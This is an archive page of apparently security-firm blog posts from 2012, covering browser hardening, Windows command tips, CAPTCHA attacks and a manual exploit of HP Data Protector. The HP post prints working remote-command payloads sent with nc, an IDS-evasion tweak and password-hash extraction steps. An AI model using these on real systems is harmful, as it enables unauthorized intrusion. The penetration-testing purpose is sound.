Friday, August 31, 2012

Basic Steps to Protect Firefox and Your Browsing Experience (How not to be a victim!)

By Jerry Pierce.

If you are like 99% of the population you graciously allow Microsoft to update your operating system software on a regular basis and you probably (hopefully!!) have an Anti-Virus product installed which is kept reasonably current in regards to detection and protection mechanisms.

On newer versions of Windows, the “Action Center” can be checked to review the state of your systems general health in regard to a Firewall, Windows Updates and Anti-Virus protections being present and functional:

Unfortunately most people still overlook one of the most common infection vectors which we see as Incident Responders within Foundstone, which is your Browser and its associated Plug-Ins.

You can’t ever really be in that 100% “cannot be infected/compromised” state of mind because vulnerabilities are constantly discovered, but you can greatly decrease the chances of this happening to you by taking a few more proactive steps on your computer.

Use NoScript

The first step I recommend is to use Firefox with the NoScript plug-in. NoScript is very well known and prohibits any script execution except for those specific sites where I have explicitly allowed them to be run (aka a “white list”). When I fire up Firefox, I see this indicator of NoScript’s status:

When I visit a website that isn’t already in my “white list” I see a slightly different representation:

It’s surprising the number of scripts (and sites) a single web page can be referencing. To see what sites are being prohibited from script execution in the current browser window, just click on the NoScript icon:

Here we see that the only attempts to execute any scripts are related directly to “” and I can either add “” to my “white list” by clicking on “Allow” or temporarily allow execution for this browser session by selecting “Temporarily allow”.

If there were multiple links attempting to execute scripts and I “trusted” them, I can globally allow execution by selecting “Allow all this page” or “Temporarily allow all this page”. (I generally never select the carte blanche “Allow all this page” and suggest you adopt that same level of prudent paranoia.

Be aware that when you visit your legitimate web sites you will have to initially add them to your “white list” so that subsequent visits will allow the site to look/behave normally – but it’s really worth the tiny bit of effort involved to raise the security bar.

Blocking script execution from general websites is already a HUGE improvement in your browser security, but you can take this much further with some simple additional steps.

Update Your Browser!

Make sure your browser itself is current and up-to-date. For Firefox, you just have to fire it up and then select “Help” and then “About Firefox” (as shown below).

If all is well and good you should see something similar to this:

If you don’t see the message: “Firefox is up to date”, it’s time to update! Below we see a screenshot of a system which has been found to have an outdated version of Firefox installed:

Update your Add-ons

Next we need to check your Add-ons (aka plugins) to ensure they are current and not known to be vulnerable. Once again from within Firefox, select “Tools” and then “Add-ons” to bring up the Add-Ons Manager:

It’s unfortunately pretty common for us to have multiple Plugins associated with our browsers, and any of them can be the key to infection or compromise. Once the “Add-On” manager is running, select “Plugins” and then “Check to see if your plugins are up to date”:

If you’re lucky (most aren’t) you’ll find that none of your plugins are obsolete or have a known security issue associated with them. Most of us will see that we have one (or more) plugins which require an update to be installed. For any plugin which is shown as being out-of-date it’s critical you install an update immediately:

Looks like we’ve got at least 2 plugins which need to be updated immediately!

With just a little effort you can dramatically improve your systems ability to fight off most infections/compromise vectors. In a nutshell:
  • Patch your operating system regularly
  • Ensure you have an active and current Anti-Virus running
  • Use a tool such as NoScript to prevent carte-blanche script execution when browsing the web
  • Ensure your browser is current and up-to-date
  • Ensure your plugins are all current and up-to-date

What do you do to protect yourself? Let us know in the comments below!

Tuesday, August 28, 2012

Manually Exploiting HP Data Protector

By Tony Lee, Amit Bagree, and Paul Haas.

Occasionally, you may find yourself in a spot where there are vulnerability checks for an issue, however there are no available exploits. In some cases you may be able to convert the check into an exploit as shown below. When we ran across this finding a while back, there were no metasploit or publicly available exploits—so we created our own with the process below.

Vulnerability Details

McAfee Vulnerability Manager (MVM) Finding

Name: HP Data Protector Client EXEC_CMD Perl Remote Code Execution
ID: 59903
Short name: HP Data Prot Mnger RCE
Alternate: CVE-2011-0923

Nessus Finding

Name: HP Data Protector Remote Command Execution
Plugin ID: 53641
Family: Gain a shell remotely
Bugtraq ID: 46234
Bugtraq ID: CVE-2011-0923

Detailed Description

“A remote code execution vulnerability exists in some versions of HP Data Protector. The flaw exists within the filtering of arguments to the EXEC_CMD command. The Data Protector client allows remote attackers to execute files within the local bin directory. Attackers can interact with a Perl interpreter and execute arbitrary code by supplying maliciously crafted input to the EXEC_CMD.” - McAfee Vulnerability Manager

Figuring out the Trigger

Probably the easiest method to determine the trigger for a particular plug-in is to look at it's source. Since Nessus is all open source this is relatively simple: just enter the plug-in directory and cat out the contents of the plug-in. However, if for whatever reason you cannot do that, you'll need to use wireshark, and assuming the data is sent in the clear, you can sniff the communication and determine the trigger. Thats how we'll continue, since its a little harder :)

Capturing with Wireshark

Open Wireshark and start the sniffer. Throw just that one exploit and follow the stream. Export the raw hex as shown below.

With the raw hex, you'll have to do some basic reformating then just use echo to type it out the to console. We'll redirect it into hexdump to make it look a little cleaner:

 root@bt:~#  echo -e '\x00\x00\x00\xa4 2\x00 nessus\x00 0\x00 SYSTEM\x00 nessus\x00 C\x00 20\x00 omnicheck.exe\x00 research\x00 /dev/null\x00 /dev/null\x00 /dev/null\x00 0\x00 0\x00 ../../../.././././././././././././\\windows\\system32\\ipconfig.exe\x00\x00' |  hexdump –C

00000000  00 00 00 a4 20 32 00 20  6e 65 73 73 75 73 00 20  |.... 2. nessus. |
00000010  30 00 20 53 59 53 54 45  4d 00 20 6e 65 73 73 75  |0. SYSTEM. nessu|
00000020  73 00 20 43 00 20 32 30  00 20 6f 6d 6e 69 63 68  |s. C. 20. omnich|
00000030  65 63 6b 2e 65 78 65 00  20 72 65 73 65 61 72 63  |eck.exe. researc|
00000040  68 00 20 2f 64 65 76 2f  6e 75 6c 6c 00 20 2f 64  |h. /dev/null. /d|
00000050  65 76 2f 6e 75 6c 6c 00  20 2f 64 65 76 2f 6e 75  |ev/null. /dev/nu|
00000060  6c 6c 00 20 30 00 20 30  00 20 2e 2e 2f 2e 2e 2f  |ll. 0. 0. ../../|
00000070  2e 2e 2f 2e 2e 2f 2e 2f  2e 2f 2e 2f 2e 2f 2e 2f  |../.././././././|
00000080  2e 2f 2e 2f 2e 2f 2e 2f  2e 2f 2e 2f 5c 77 69 6e  |././././././\win|
00000090  64 6f 77 73 5c 73 79 73  74 65 6d 33 32 5c 69 70  |dows\system32\ip|
000000a0  63 6f 6e 66 69 67 2e 65  78 65 00 00 0a           |config.exe...|

Now all that is needed to throw this at a target is to change “hexdump –C” to “nc [host] [port]”. For instance:
 nc 5555

Avoiding the IDS

Depending on the configuration, an IDS might trigger on anything. Oddly enough, the one we were playing with, only triggered on the "Nessus" tag!

 root@bt:~# echo -e '\x00\x00\x00\xa4 2\x00 FSchck\x00 0\x00 SYSTEM\x00 FSchck\x00 C\x00 20\x00 omnicheck.exe\x00 research\x00 /dev/null\x00 /dev/null\x00 /dev/null\x00 0\x00 0\x00 ../../../.././././././././././././\\windows\\system32\\ipconfig.exe\x00\x00' |  hexdump -C
00000000  00 00 00 a4 20 32 00 20  46 53 63 68 63 6b 00 20  |.... 2. FSchck. |
00000010  30 00 20 53 59 53 54 45  4d 00 20 46 53 63 68 63  |0. SYSTEM. FSchc|
00000020  6b 00 20 43 00 20 32 30  00 20 6f 6d 6e 69 63 68  |k. C. 20. omnich|
00000030  65 63 6b 2e 65 78 65 00  20 72 65 73 65 61 72 63  |eck.exe. researc|
00000040  68 00 20 2f 64 65 76 2f  6e 75 6c 6c 00 20 2f 64  |h. /dev/null. /d|
00000050  65 76 2f 6e 75 6c 6c 00  20 2f 64 65 76 2f 6e 75  |ev/null. /dev/nu|
00000060  6c 6c 00 20 30 00 20 30  00 20 2e 2e 2f 2e 2e 2f  |ll. 0. 0. ../../|
00000070  2e 2e 2f 2e 2e 2f 2e 2f  2e 2f 2e 2f 2e 2f 2e 2f  |../.././././././|
00000080  2e 2f 2e 2f 2e 2f 2e 2f  2e 2f 2e 2f 5c 77 69 6e  |././././././\win|
00000090  64 6f 77 73 5c 73 79 73  74 65 6d 33 32 5c 69 70  |dows\system32\ip|
000000a0  63 6f 6e 66 69 67 2e 65  78 65 00 00 0a           |config.exe...|


Against a Windows Host

 root@bt:~# echo -e '\x00\x00\x00\xa4 2\x00 fschck\x00 0\x00 SYSTEM\x00 fschck\x00 C\x00 20\x00 omnicheck.exe\x00 research\x00 /dev/null\x00 /dev/null\x00 /dev/null\x00 0\x00 0\x00 ../../../../././././././././././\\windows\\system32\\whoami.exe\x00\x00' | nc 5555

Jÿþ15 [70:18] nt authority\systemÿþ6 0

Against a Linux Host

 root@bt:~# echo -e '\x00\x00\x00\xa4 2\x00 fschck\x00 0\x00 SYSTEM\x00 fschck\x00 C\x00 20\x00 omnicheck.exe\x00 research\x00 /dev/null\x00 /dev/null\x00 /dev/null\x00 0\x00 0\x00 ../../../.././././././././././././././././././././usr/bin/id\x00\x00' | nc 5555

¿15 [12:1] [2004] 13015 uid=0(root) gid=0(root) groups=3(sys),1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)

The nice thing about these one-liners is that they can be scripted to check a series of hosts.


The one limitation that we ran across is that we could not include spaces, thus we could not supply parameters to our commands--even a \x20 was getting eaten.

Solution: Paul came up with a slick way to get the shadowed hashes, add a user, and log in (great for any occasion where you have remote command execution without params):

  1. Run “pwunconv” to put password hashes into /etc/passwd
  2. Run “vipw” to display /etc/passwd
  3. Crack the hashes
  4. Log into box with legitimate credentials

Current State

There is now a metasploit module that will get shell on a *nix box, however spaces in Windows still seems to be an issue. Read the MSF modules for complete descriptions.
 Matching Modules

   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/admin/hp/hp_data_protector_cmd       2011-02-07       normal     HP Data Protector 6.1 EXEC_CMD Command Execution
   exploit/linux/misc/hp_data_protector_cmd_exec  2011-02-07       excellent  HP Data Protector 6.1 EXEC_CMD Remote Code Execution

The Fix

There is a fix for this issue which we obviously recommend applying as soon as possible (after proper testing). Download the latest version A.06.20 of HP Data Protector from

Final Thoughts

When a publicly available exploit does not exist, but a vulnerability check does—it may be possible to get the exploit from the check with some careful [packet] inspection. Brainstorm with some colleagues and it may be possible to leverage creative methods to eventually gain access to the host even with significant limitations.

Tuesday, August 21, 2012

Bypassing CAPTCHAs by Impersonating CAPTCHA Providers

By Gursev Kalra.

CAPTCHA service providers validate millions of CAPTCHAs each day and protect thousands of websites against the bots. A secure CAPTCHA generation and validation ecosystem forms the basis of the mutual trust model between the CAPTCHA provider and the consumer. A variety of damage can occur if any component of this ecosystem is compromised.

During Analysis of the CAPTCHA integration libraries provided by several CAPTCHA providers (including reCAPTCHA) revealed that almost all of the CAPTCHA verification API’s relied on plain text HTTP protocol to perform CAPTCHA validation. Because of this, the CAPTCHA provider’s identity was not validated, message authentication checks were not performed and the entire CAPTCHA validation was performed on an unencrypted channel. This vulnerability was also reported to reCAPTCHA team several months back.

If you decompile the .NET Plugin, you'll be able to pull out reCAPTCHA's verification URL, which demonstrates the absense of HTTPS:

In the current scenario, two types of attacks can be launched against vulnerable CAPTCHA implementations. These attacks are based on the assumption that an attacker is able to intercept the CAPTCHA validation traffic between target website and the CAPTCHA provider.

Private Key Compromise

Most of CAPTCHA providers issue private and public keys to identify a particular consumer and to enforce an upper limit on the number of CAPTCHAs used by them. Private keys are often sent over to the CAPTCHA provider during the CAPTCHA validation process. If the public and private keys are sent using plain text HTTP, an attacker could sniff the private keys and:

  1. Use the CAPTCHA service for without registering for the service by using the captured keys.
  2. Exhaust the target web site’s CAPTCHA quota for the service, which depending on the CAPTCHA provider may cause a wide variety of unexpected issues.

The CAPTCHA Clipping Attack

The following image describes what I call the "CAPTCHA Clipping Attack". Notice that steps 5 and 6 in blue would be the normal operation of events. We'll go into the attack in a little more detail below.

Since the website’s application server acts as a client to CAPTCHA provider during steps 5 and 6 (in blue) and the application server often neglects to validate the CAPTCHA provider’s identity and the session integrity checks, an attacker may be able to impersonate the CAPTCHA provider and undermine the anti-automation protection (steps 5 and 6 in red). CAPTCHA validation responses are mostly Boolean (true or false, success or failure, pass or fail, 0 or 1). The response format and its contents are also publicly available as part of CAPTCHA provider’s API documentation. This allows an attacker to easily construct the finite set of possible responses, impersonate the CAPTCHA provider, and perform malicious CAPTCHA validation for the application servers.

To exploit this vulnerability an attacker performs the following:

  1. The attacker acts as a legitimate application user and submits a large number of requests to the web application.
  2. At the same time, he/she intercepts CAPTCHA validation requests, masquerades as the CAPTCHA provider and approves all submitted requests.

Masquerading as the CAPTCHA provider and not forwarding the CAPTCHA validation requests to the actual CAPTCHA provider is the CAPTCHA Clipping Attack.


clipcaptcha is a proof of concept exploitation tool that specifically targets the vulnerabilities discussed above and allows complete bypass of CAPTCHA provider protection. clipcaptcha is built on the sslstrip codebase and has the following features:

  1. Performs signature based CAPTCHA provider detection and clipping.
  2. Can be easily extended to masquerade as any CAPTCHA provider by adding corresponding signatures to the configuration XML file.
  3. Has built in signatures of several CAPTCHA providers including reCAPTCHA, OpenCAPTCHA, Captchator etc…
  4. Logs POST requests that match any supported CAPTCHA provider to capture private and public keys. Unmatched requests are forwarded as is.
  5. clipcaptcha supports five operational modes. These are “monitor”, “stealth”, “avalanche”, “denial of service” and “random”.


clipcaptcha can be downloaded here:

Want more info? We'll have a new whitepaper about the attack in Foundstone's whitepaper section soon!

Tuesday, August 14, 2012

Simple but Extremely Useful Windows Tricks

By Tony Lee and Matt Kemelhar.

Navigating Windows in the most efficient manner possible can be seen as wizardry-- it almost seems as if Microsoft tries to make it increasingly more difficult to accomplish simple things. However, there are plenty of very useful tricks and shortcuts built into Windows, the problem is they are not publicized very well. Students in our Ultimate Hacking Courses usually find these Windows tips useful, so we figured we would share them.

Command shell history

If you thought “doskey /history” was cool—this is even better and more useful. Function keys help control and recall the command history in Windows. We have noted the most useful keys and their function below. Try them out for yourself.

F7 – Graphical command shell history After hitting F7, you can use the arrow keys to scroll up and down through the command history and then use the right key in order to edit the command or hit enter to run the command. The screenshot below shows a graphical command history is presented after the user presses F7. This can be navigated via arrow keys.

F1 – Letter by letter repeat of the last command

F2 – Retype letters up to a certain letter

F3 – Retype last command

F4 – Delete characters from the cursor up to a certain character

F5 – Scroll up through command history (same as up arrow)

F9 – Enter the command number you would repeat

Command shell shortcuts

Adjusting the command shell to fit your preference can sometimes be a headache (too much clicking for a shell) here are some ways to customize the view without touching the mouse

mode – adjusting the size of the command shell

This is often very useful when running commands whose output extends beyond the 80 character default width of the unaltered command shell.

Syntax: mode [width],[height]

Ex: mode 120,120

This screenshot shows you what it looks like to expand the window quickly with mode.

color - Sets the default console foreground and background colors

This is very useful when setting different color shells to indicate different functionality.

COLOR [attr]
   attr        Specifies color attribute of console output

Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground.  Each digit can be any of the following values:

    0 = Black       8 = Gray
    1 = Blue        9 = Light Blue
    2 = Green       A = Light Green
    3 = Aqua        B = Light Aqua
    4 = Red         C = Light Red
    5 = Purple      D = Light Purple
    6 = Yellow      E = Light Yellow
    7 = White       F = Bright White

If no argument is given, this command restores the color to what it was when CMD.EXE started.

The screenshot below shows two different windows with two different colors with netcat listeners on different ports.

Title - Sets the window title for the command prompt window

This is also useful for labeling your windows with a title that is easy to remember and descriptive of what you are working on.

TITLE [string] string       Specifies the title for the command prompt window.

Let's see what this looks like - the screenshot below shows how to change the title of the window via the command line

findstr – (grep for Windows)

findstr searches for strings in files [or anything else]. If you wanted grep in Windows, you got it. findstr has been present in Windows since XP and 2003. It accepts regular expressions and can search case insensitive (/I). One of our favorite ways to use this command is for filtering—especially long lists such as process listings and listening ports.

Process lists:
C:\>tasklist | findstr /i EXPLORER
explorer.exe         3404 Console                    1    119,884 K

Port lists:
C:\>netstat -an | findstr 135
  TCP                LISTENING
  TCP    [::]:135               [::]:0                 LISTENING

C:\>netstat -an | findstr 445
  TCP                LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  UDP        *:*

write - the greatest shortcut ever

Prefer WordPad over Notepad at times?

Want to launch it from the command line, but you hate typing the full path (c:\Program Files\Windows NT\Accessories\wordpad.exe c:\Program Files (x86)\Windows NT\Accessories\wordpad.exe) to launch it?
How about five letters? w r i t e

tree – graphical “text” directory listings

Ever wanted to dump the contents of a particular directory or structure to a text file? tree is the way to go—it is fast and recursive. The “/F” attribute will list the files in addition to the folders—leave it off and you just get the folders. "/A" is useful if you are sending output to a text file or other document.

TREE [drive:][path] [/F] [/A]

   /F   Display the names of the files in each folder.
   /A   Use ASCII instead of extended characters.

C:\> tree /a /f c:\users

Folder PATH listing for volume PSV
Volume serial number is 8800-000
|   |   test.exe
|   |   Sti_Trace.log
|   |
|   +---Contacts
|   |
|   |
|   +---Desktop
|   |   |   cmd.txt
|   |   |   fixPrinter.bat
|   |   |   malicious.exe
|   |   |   research.txt


type - when you can’t spare the GUI

If you live in the command line and don’t want to spawn a graphical text editor to read a simple file, you can always “type” the file. This is similar to “cat” in *nix. If you need to read larger documents, it can be piped to more or just use more to read the file in the first place.

TYPE [drive:][path]filename

C:\>type %TEMP%\readme.txt
"This is how you can read a text file from the command line"

Those are some of our favorite tricks to make Windows more convenient to use! Hopefully there was at least one trick here that is new for you.

Do you have any tricks that amaze others? Share them in the comments below!

Tuesday, August 7, 2012

Can You Break My CAPTCHA?

By Gursev Kalra.

I wrote a simple CAPTCHA scheme and wanted to share it with the awesome security community as a CAPTCHA breaking exercise. To solve the CAPTCHA an individual (or machine) will have to enter only the characters with a white border and ignore other text. I understand that at this stage the lettering may sometimes be hard to read, we're working on that, but for now, lets see how far we can get with this POC design. Here are a couple:

Anti-Automation Mechanisms

The main intent was to make Noise removal, Segmentation and Classification interdependent and increase the complexity of automatic solvers. Here are the anti-automation mechanisms in this CAPTCHA:

  1. Closeness of noise to real text : The noise is of same style (i.e. alphanumeric) and superimposed on the real text. The font is of same size as original text and the text to be solved. This increases the difficulty of removing the noise and regular noise removal algorithms may be ineffective. The random background line serves to highlight the white border and also as a noise source.
  2. Hard to Segment : The CAPTCHA solution and noise are mixed up in an unpredictable fashion with random positioning variation on X and Y axis. It may therefore be hard to segment various alphabets from each other single out individual characters for classification.
  3. Anti-Classification :While writing custom solvers, statistical analysis is performed to on CAPTCHA text by plotting the pixel densities against X and Y axis to identify the correct characters. When text is superimposed with no clear indication on demarcation of text boundary, the classification techniques do not work.


You can find 200 samples for download here:

Where to start?

Since this is a new scheme, you may not be able to use any of the popular CAPTCHA breaking tools out there to defeat it. Instead, one approach is to use a graphics editing software like Adobe Photoshop to modify a sample. Once you have a set of actions (e.g. apply effect X then apply filter Y) that you can repeat on multiple samples to reliably solve them - you have a potential solution! Then just post your solution or questions in the comments below and we can discuss!